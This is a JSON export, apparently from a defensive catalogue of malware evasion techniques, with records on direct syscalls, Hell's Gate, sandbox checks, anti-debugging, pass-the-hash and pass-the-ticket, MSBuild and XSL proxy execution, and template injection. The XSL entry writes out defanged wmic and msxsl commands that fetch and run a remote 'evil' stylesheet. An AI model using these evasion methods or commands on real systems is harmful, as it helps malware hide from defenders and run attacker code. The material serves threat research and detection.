606,
607,
608,
609,
610,
611,
612,
613,
614,
615,
616,
617,
618,
619
],
"contributors": [
4
]
},
{
"id": 352,
"key": "evasion-using-direct-syscalls",
"unprotect_id": "U0521",
"name": "Evasion using direct Syscalls",
"description": "In the Windows operating system, conventional malware frequently utilizes strategies involving the invocation of specific functions from the kernel32.dll library, such as `VirtualAlloc`, `VirtualProtect`, and `CreateThread`. A closer inspection of the call stack reveals that the functions employed from kernel32.dll eventually trigger corresponding functions within the ntdll.dll library. This is facilitated by the ntdll.dll library, which serves as the gateway to the Windows kernel, executing this transition via system calls (syscalls). Hence, any function invoked from kernel32.dll will subsequently prompt one or more associated functions within ntdll.dll. To illustrate, the `VirtualProtect` function from kernel32.dll corresponds to the `NtProtectVirtualMemory` function in ntdll.dll.\r\n\r\nEndpoint Detection and Response (EDR) and Antivirus (AV) systems generally hook onto the ntdll.dll, but only for a handful of crucial functions often exploited by malware. These systems actively monitor potentially exploitable behavior.\r\n\r\nThis technique can also be used for sandbox evasion. Some sandboxes log only higher-level WinAPI or NT API calls, but do not monitor or hook syscalls (or sysenters). Sandboxes that are missing these events will not see these calls. To combat this technique, ensure your sandboxes are able to log/hook syscalls and kernel function calls.\r\n\r\n## Unique Aspects of This Technique\r\nThe distinctiveness of this technique lies in its ability to invoke direct syscalls using assembly without calling upon any kernel32 or ntdll functions. It also bypasses the implementation of createthread by directly jumping to a custom heap variable, altering its protection, and finally returning for a clean exit - all without the need to allocate memory, change protection, and copy the payload to the new memory location.\r\n\r\nAnother intriguing aspect is the flexibility in naming the extern functions. These functions need not necessarily be called `VirtualProtect` or `VirtualAlloc`. They can have any arbitrary name of your choice, which enhances the complexity of analysis, particularly when disassembled. For instance, it could be named `myCustomDontProtect`, or even something obscure like `rYTBbmNPTDoscUV`.\r\n\r\n## Operational Mechanism\r\nThe main function initiates by setting up markers using inline assembly and then calls an extern function to unprotect the heap variable location containing the executable payload (in this instance, 'calc'). This extern function is converted into assembly code that triggers the syscall. Subsequently, the main function conserves the registers and prompts payload execution via another extern function. This function, in turn, translates to a \"jmp\" instruction that directs execution to the heap location, executing the payload. The payload contains instructions to return via another \"jmp\" instruction. The return location is preserved in the R15 register using inline assembly in the main function. Post return to the main function, the registers are restored, and the program gracefully terminates.",
"resources": "https://medium.com/@merasor07/av-edr-evasion-using-direct-system-calls-user-mode-vs-kernel-mode-fad2fdfed01a\r\nhttps://github.com/ghostpepper108/Evasion",
"creation_date": "2023-05-18T23:39:48.016000Z",
"tags": "Kernel32.dll, VirtualAlloc, VirtualProtect, CreateThread, Call stack, Ntdll.dll, Syscall, NtProtectVirtualMemory, EDRs/AVs, Hook onto ntdll.dll, Direct syscalls, Assembly, Heap variable",
"modification_date": "2024-01-14T23:57:50.362000Z",
"category": [
2
],
"rules": [
150
],
"attachments": [],
"featured_api": [
419
],
"contributors": [
11,
27,
32
]
},
{
"id": 351,
"key": "hells-gate",
"unprotect_id": "U0520",
"name": "Hell's Gate",
"description": "The Hell's Gate technique refers to a specific method used by malware authors to make their software more difficult to detect and analyze. The technique involves the use of a custom native API resolver to resolve Windows API functions at runtime dynamically.\r\n\r\nBy using Hell's Gate, malware can avoid referencing the Windows API functions directly in the Import Address Table (IAT). This makes it harder for security analysts and automated tools to identify and trace the malware's behavior. The technique essentially hides the malware's intentions by obfuscating the API calls it uses to perform its malicious activities.\r\n\r\nThe Hell's Gate malware technique is a method used by malware authors to dynamically resolve Windows API functions at runtime, making the malware more difficult to analyze and detect. It achieves this by bypassing the conventional method of statically linking API functions in the Import Address Table.",
"resources": "https://teamhydra.blog/2020/09/18/implementing-direct-syscalls-using-hells-gate/\nhttps://rioasmara.com/2022/03/09/hellgate-technique-on-av-bypass/",
"creation_date": "2023-04-02T03:05:42.415000Z",
"tags": "hellsgate, AV bypass, IAT, Obfuscation",
"modification_date": "2023-10-04T10:44:54.981000Z",
"category": [
2
],
"rules": [],
"attachments": [
"fbcc6ce5-437d-4b87-ab51-a753f404e104"
],
"featured_api": [],
"contributors": []
},
{
"id": 350,
"key": "xsl-script-processing",
"unprotect_id": "T1220",
"name": "XSL Script Processing",
"description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. \r\n\r\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.\r\n\r\nCommand-line examples:\r\n\r\nmsxsl.exe customers[.]xml script[.]xsl\r\nmsxsl.exe script[.]xsl script[.]xsl\r\nmsxsl.exe script[.]jpeg script[.]jpeg\r\nAnother variation of this technique, dubbed \"Squiblytwo\", involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file. This technique can also execute local/remote scripts and, similar to its Regsvr32/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.\r\nCommand-line examples:\r\n\r\nLocal File: wmic process list /FORMAT:evil[.]xsl\r\nRemote File: wmic os get /FORMAT:\"https[:]//example[.]com/evil[.]xsl\"",
"resources": "https://attack.mitre.org/techniques/T1220/",
"creation_date": "2023-03-21T00:00:35.711000Z",
"tags": "Defense Evasion,\r\nbypass application control,\r\nExtensible Stylesheet Language (XSL),\r\nexecute arbitrary files,\r\nMicrosoft common line transformation utility binary (msxsl.exe),\r\nexecute malicious embedded JavaScript,\r\nXSL files,\r\nSquiblytwo,\r\nWindows Management Instrumentation,\r\n/FORMAT,",
"modification_date": "2023-10-04T10:44:30.142000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 349,
"key": "virtualizationsandbox-evasion-time-based-evasion",
"unprotect_id": "T1497.003",
"name": "Virtualization/Sandbox Evasion: Time Based Evasion",
"description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\r\n\r\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: Scheduled Task/Job). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.\r\n\r\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as Pings, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments. Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).\r\n\r\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.",
"resources": "https://attack.mitre.org/techniques/T1497/003/",
"creation_date": "2023-03-20T23:56:48.796000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME),\r\nsandbox,\r\ndelaying malware functionality,\r\nsleep commands,\r\nnative system scheduling functionality,\r\nevent based triggers,\r\nscheduled Multi-Stage Channels,\r\nAPI hammering,\r\ntimestamp sampling,",
"modification_date": "2023-10-04T10:43:59.645000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 348,
"key": "virtualizationsandbox-evasion-user-activity-based-checks",
"unprotect_id": "T1497.002",
"name": "Virtualization/Sandbox Evasion: User Activity Based Checks",
"description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\r\n\r\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks, browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro or waiting for a user to double click on an embedded image to activate",
"resources": "https://attack.mitre.org/techniques/T1497/002/",
"creation_date": "2023-03-20T23:53:34.833000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME),\r\nsandbox,\r\nmonitor mouse clicks,",
"modification_date": "2023-10-04T10:43:55.889000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 347,
"key": "virtualizationsandbox-evasion-system-checks",
"unprotect_id": "T1497.001",
"name": "Virtualization/Sandbox Evasion: System Checks",
"description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\r\n\r\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.\r\n\r\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.\r\n\r\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions. In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.\r\n\r\nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.",
"resources": "https://attack.mitre.org/techniques/T1497/001/",
"creation_date": "2023-03-20T23:50:55.107000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME) detection,\r\nsandbox detection,\r\nVME artifacts,\r\nWindows Management Instrumentation, \r\nPowerShell, \r\nSystem Information Discovery, \r\nQuery Registry ,\r\nhost/domain name,\r\nnetwork traffic,\r\nhardware info,\r\nVMWare,\r\nvirtualisation,",
"modification_date": "2023-10-04T10:43:55.298000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 346,
"key": "valid-accounts-local-accounts",
"unprotect_id": "T1078.003",
"name": "Valid Accounts: Local Accounts",
"description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\r\n\r\nLocal Accounts may also be abused to elevate privileges and harvest credentials through OS Credential Dumping. Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.",
"resources": "https://attack.mitre.org/techniques/T1078/003/",
"creation_date": "2023-03-20T23:47:08.395000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation, \r\nInitial Access,\r\nOS Credential Dumping,\r\nPassword reuse,\r\nweak passwords,\r\nlateral movement,",
"modification_date": "2023-10-04T10:44:50.140000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 345,
"key": "valid-accounts-domain-accounts",
"unprotect_id": "T1078.002",
"name": "Valid Accounts: Domain Accounts",
"description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.\r\n\r\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as OS Credential Dumping or password reuse, allowing access to privileged resources of the domain.",
"resources": "https://attack.mitre.org/techniques/T1078/002/",
"creation_date": "2023-03-20T23:45:20.275000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation, \r\nInitial Access,\r\nActive Directory Domain Services,\r\nOS Credential Dumping,\r\npassword reuse,\r\nweak passwords,\r\nprivileged domain resources,\r\nlateral movement,",
"modification_date": "2023-10-04T10:43:30.236000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 344,
"key": "valid-accounts-default-accounts",
"unprotect_id": "T1078.001",
"name": "Valid Accounts: Default Accounts",
"description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.\r\n\r\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services.",
"resources": "https://attack.mitre.org/techniques/T1078/001/",
"creation_date": "2023-03-20T23:43:16.770000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation,\r\nInitial Access,\r\nbuilt-into an OS accounts,\r\nadmin accounts,\r\nguest accounts,\r\npublicly disclosed credentials,\r\nstolen credentials,\r\nstolen private keys,\r\nremote access,",
"modification_date": "2023-10-04T10:44:49.175000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 343,
"key": "scrubcrypt",
"unprotect_id": "U1430",
"name": "ScrubCrypt",
"description": "ScrubCrypt is a malware obfuscation and encryption framework, derived from the earlier JLaive Batchfuscator crypter. It is designed to aid cybercriminals in evading detection and analysis by using a variety of techniques to conceal and protect the malicious software.\r\n\r\nScrubCrypt is advertised on cybercrime forums to employ encryption, code morphing, and (allegedly) polymorphism to create obfuscated malware payloads that are challenging to reverse-engineer and detection.\r\n\r\nThe Batch files generated by ScrubCrypt contain a Base64 encoded, AES-128-CBC encrypted and gzip compressed payload, which is executed / reflectively loaded.",
"resources": "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nhttps://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt\r\nhttps://twitter.com/SI_FalconTeam/status/1742527508682072179",
"creation_date": "2023-03-19T23:57:01.684000Z",
"tags": "packers, ScrubCrypt, obfuscation",
"modification_date": "2024-01-03T22:08:51.890000Z",
"category": [
12
],
"rules": [
135
],
"attachments": [],
"featured_api": [],
"contributors": [
31
]
},
{
"id": 342,
"key": "constant-blinding",
"unprotect_id": "U0707",
"name": "Constant Blinding",
"description": "Constant blinding can be employed by malware authors to obfuscate their malicious code, making it harder for security researchers and antivirus software to detect and analyze the malware. By using constant blinding techniques, the malware code can be concealed, increasing its chances of evading detection and maintaining persistence on the target system.\r\n\r\nHere's how constant blinding can be utilized in malware:\r\n\r\n1. Obfuscating malicious constants: Malware may contain specific constants, such as IP addresses or URLs for command and control (C2) servers or specific strings used as encryption keys. By applying constant blinding, these constants can be hidden, making it difficult for researchers to identify the purpose of the constant or uncover the C2 infrastructure.\r\n\r\n2. Concealing code patterns: Antivirus software often relies on signature-based detection, which looks for known patterns of code within the executable. By applying constant blinding to the malware code, these recognizable patterns can be obscured, helping the malware evade signature-based detection.\r\n\r\n2. Hiding exploit payloads: In a multi-stage attack, constant blinding can be used to conceal the payload of an exploit. By XORing the payload with a randomly generated key, the true nature of the payload is hidden until it is executed on the target system, making it more challenging for security tools to identify the malicious payload.\r\n\r\n3. Encrypted communication: Constant blinding techniques can be used to encrypt communication between the malware and the C2 server. By XORing the data transmitted with a randomly generated key, the malware can protect the confidentiality of the communication and make it more challenging for researchers to intercept and analyze the data.",
"resources": "https://hal.inria.fr/hal-01382971/file/PID4513621.pdf",
"creation_date": "2023-03-19T23:46:54.952000Z",
"tags": "Constant blinding, Malware, Obfuscation, constant blinding techniques, encryption keys, code patterns, signature-based detection, recognizable patterns, exploit payloads, XORing, randomly generated key, encrypted communication,",
"modification_date": "2023-10-04T10:44:38.658000Z",
"category": [
7
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 341,
"key": "unloading-module-with-freelibrary",
"unprotect_id": "U0519",
"name": "Unloading Module with FreeLibrary",
"description": "Malware authors often use various techniques to evade detection by AV/EDR solutions. One such technique involves checking for the presence of AV/EDR DLLs that may be loaded in the malware's address space and attempting to unload them before executing their malicious code.\r\n\r\nTo do this, the malware first uses the `GetModuleHandleA` function to retrieve a handle to the DLL, if it's already loaded. Once it has a valid handle, the malware then calls the `FreeLibrary` function to free and unload the DLL from memory.\r\n\r\nBy unloading the AV/EDR DLL, the malware can avoid detection and carry out its malicious activities without being monitored or blocked by the security software. However, it is important to note that this technique only affects user-mode components of an EDR and not kernel components. Additionally, modern EDR systems have evolved to detect such evasive techniques and prevent malware from disabling them.",
"resources": "http://malwarejake.blogspot.com/2013/07/interesting-malware-defense.html\nhttps://rstforums.com/forum/topic/110743-make-your-dynamic-module-unfreeable-anti-freelibrary/\nhttps://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
"creation_date": "2023-03-19T22:08:54.336000Z",
"tags": "Malware, AV/EDR, detection, DLL, address space, unload, GetModuleHandleA, FreeLibrary,",
"modification_date": "2023-10-04T10:44:48.899000Z",
"category": [
2
],
"rules": [
133
],
"attachments": [],
"featured_api": [
375,
376
],
"contributors": []
},
{
"id": 340,
"key": "addvectoredexceptionhandler",
"unprotect_id": "U0125",
"name": "AddVectoredExceptionHandler",
"description": "The `AddVectoredExceptionHandler` technique is an anti-debugging method that can detect the presence of debuggers using Vectored Exception Handlers. This technique works by calling `AddVectoredExceptionHandler(1, ourHandler)` to register a top-level exception handler that will catch any exceptions raised by the process, including those generated by debuggers.\r\n\r\nAfter this call has taken place, stepping through the code will trigger an `EXCEPTION_SINGLE_STEP` exception, which is caught by our top-level handler. This exception is typically only generated by debuggers and is therefore a strong indicator that a debugger is present.",
"resources": "https://learn.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-addvectoredexceptionhandler",
"creation_date": "2023-03-10T02:40:20.368000Z",
"tags": "Anti-debugging, Vectored Exception Handlers, AddVectoredExceptionHandler, Debugging, Exception handling, EXCEPTION_SINGLE_STEP",
"modification_date": "2023-10-04T10:44:23.409000Z",
"category": [
3
],
"rules": [],
"attachments": [],
"featured_api": [
593
],
"contributors": []
},
{
"id": 339,
"key": "call-to-interrupt-procedure",
"unprotect_id": "U0124",
"name": "Call to Interrupt Procedure",
"description": "This anti-debugging technique involves using the `INT n` instruction to generate a call to the interrupt or exception handler specified with the destination operand.\r\n\r\nTo implement this technique, the int `0x03` instruction is executed, followed by a `ret` (0xCD03, 0xC3) nested in a `__try, __except block`. If a debugger is present, the except block will not be executed, and the function will return TRUE, indicating that a debugger is running.\r\n\r\nThis technique can be used to prevent analysts from analyzing and manipulating the malware's code during runtime.",
"resources": "http://www.nacad.ufrj.br/online/intel/vtune/users_guide/mergedProjects/analyzer_ec/mergedProjects/reference_olh/mergedProjects/instructions/instruct32_hh/vc140.htm",
"creation_date": "2023-03-10T02:29:39.347000Z",
"tags": "Anti-debugging, X86 instruction, RET",
"modification_date": "2023-10-04T10:44:25.147000Z",
"category": [
3
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 338,
"key": "use-alternate-authentication-material-pass-the-ticket",
"unprotect_id": "T1550.003",
"name": "Use Alternate Authentication Material: Pass the Ticket",
"description": "Adversaries may \"pass the ticket\" using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\r\n\r\nWhen preforming PtT, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.\r\n\r\nA Silver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).\r\n\r\nA Golden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.\r\n\r\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. Pass the Hash) while also using the password hash to create a valid Kerberos ticket",
"resources": "https://attack.mitre.org/techniques/T1550/003/",
"creation_date": "2023-03-07T04:14:30.236000Z",
"tags": "Defense Evasion, \r\nLateral Movement,\r\nstolen password hashes,\r\nstolen AES keys,\r\nbypass system access controls,\r\nKerberos authentication,\r\nPtT,\r\nOS Credential Dumping,\r\nTicket Granting Ticket (TGT),\r\nTicket Granting Service (TGS),\r\nSilver Ticket,\r\nGolden Ticket,\r\nKey Distribution Service account KRBTGT account NTLM hash,\r\nKerberos ticket,\r\noverpassing the hash,\r\nPass the Hash,\r\nAPT28,\r\nAPT32,",
"modification_date": "2023-10-04T10:43:42.393000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 337,
"key": "use-alternate-authentication-material-pass-the-hash",
"unprotect_id": "T1550.002",
"name": "Use Alternate Authentication Material: Pass the Hash",
"description": "Adversaries may \"pass the hash\" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\r\n\r\nWhen performing PtH, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\r\n\r\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform Pass the Ticket attacks",
"resources": "https://attack.mitre.org/techniques/T1550/002/",
"creation_date": "2023-03-07T04:08:51.289000Z",
"tags": "Defense Evasion, \r\nLateral Movement,\r\nstolen password hashes,\r\nbypass system access controls,\r\nbypass standard authentication steps,\r\nPtH,\r\nCredential Access,\r\noverpass the hash,\r\nKerberos ticket,\r\nPass the Ticket,\r\nAPT1,\r\nAPT28,\r\nAPT32,",
"modification_date": "2023-10-04T10:44:24.203000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 336,
"key": "trusted-developer-utilities-proxy-execution-msbuild",
"unprotect_id": "T1127.001",
"name": "Trusted Developer Utilities Proxy Execution: MSBuild",
"description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.\r\n\r\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution",
"resources": "https://attack.mitre.org/techniques/T1127/001/",
"creation_date": "2023-03-07T04:04:33.351000Z",
"tags": "Defense Evasion,\r\nproxy execution of malicious code,\r\nMSBuild.exe (Microsoft Build Engine),\r\nexecute arbitrary code,\r\nbypass application control defenses,\r\n.NET Framework 4,",
"modification_date": "2023-10-04T10:44:15.323000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 335,
"key": "traffic-signaling-socket-filters",
"unprotect_id": "T1205.002",
"name": "Traffic Signaling: Socket Filters",
"description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\r\n\r\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria. Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with Protocol Tunneling.\r\n\r\nFilters can be installed on Windows hosts using Winpcap.",
"resources": "https://attack.mitre.org/techniques/T1205/002/",
"creation_date": "2023-03-07T03:59:35.951000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nCommand and Control,\r\nnetwork socket filtering,\r\nactivate backdoors,\r\nWinpcap,\r\nProtocol Tunneling,\r\nraw socket connections,",
"modification_date": "2023-10-04T10:43:35.310000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 334,
"key": "traffic-signaling-port-knocking",
"unprotect_id": "T1205.001",
"name": "Traffic Signaling: Port Knocking",
"description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\r\n\r\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\r\n\r\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
"resources": "https://attack.mitre.org/techniques/T1205/001/",
"creation_date": "2023-03-07T03:54:15.801000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nCommand and Control,\r\nhide open ports,\r\ndynamic opening of a listening port,\r\nconnection to listening servers,\r\nlibpcap libraries,\r\nraw sockets,",
"modification_date": "2023-10-04T10:44:23.953000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 333,
"key": "template-injection",
"unprotect_id": "T1221",
"name": "Template Injection",
"description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.\r\n\r\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\r\n\r\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.\r\n\r\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.\r\n\r\nThis technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt",
"resources": "https://attack.mitre.org/techniques/T1221/",
"creation_date": "2023-03-07T03:50:18.208000Z",
"tags": "Defense Evasion,\r\n.docx, \r\n.xlsx, \r\n.pptx, \r\n.dot,\r\nconceal malicious code in documents,\r\ndocument injection,\r\n*\\template control word,\r\n.rtf file,\r\nForced Authentication,\r\nAPT28,\r\nmalicious macros,",
"modification_date": "2023-10-04T10:44:29.999000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
}
]
}
